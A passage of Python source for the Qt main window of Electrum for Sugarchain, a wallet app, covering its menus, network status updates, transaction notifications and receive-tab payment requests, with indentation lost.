QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum for Sugarchain Testnet" if constants.net.TESTNET else "Electrum for Sugarchain"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://sugarchain.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('sugarchain:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-SUGAR",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum for Sugarchain - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum for Sugarchain", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum for Sugarchain", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
